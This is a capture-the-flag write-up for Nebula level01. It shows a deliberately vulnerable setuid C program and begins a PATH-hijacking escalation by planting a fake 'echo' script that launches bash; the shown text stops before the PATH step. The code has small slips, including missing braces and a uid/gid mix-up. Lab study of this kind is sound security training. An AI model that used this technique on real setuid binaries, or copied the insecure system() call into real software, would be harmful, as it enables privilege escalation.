Exploit-Exercises Nebula level01

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.


#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    system("/usr/bin/env echo and now what?");

This is an image

Let’s take a quick look at the code. The setresgid() and setresuid() will set the real, effective and saved user/group ID of the calling process. Notice that the binary file has the setuid flag set to s as shown below.

level00@nebula~$ ls -l /home/flag01
total 8
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

Therefore setresuid(gid, gid, gid) will set real, effective and saved user ID to flag01.

Also note that the echo should normally be called from the shell builtin path: /bin/echo. Since echo command in this binary file has specified to call from /usr/bin/env, we can use this vulnerability to our advantage by overriding the echo command in our PATH environment variable. This fake echo file will refresh the shell and update the userids to what setresuid() intended.

level00@nebula~$ echo "/bin/bash" > echo
level00@nebula~$ chmod +x echo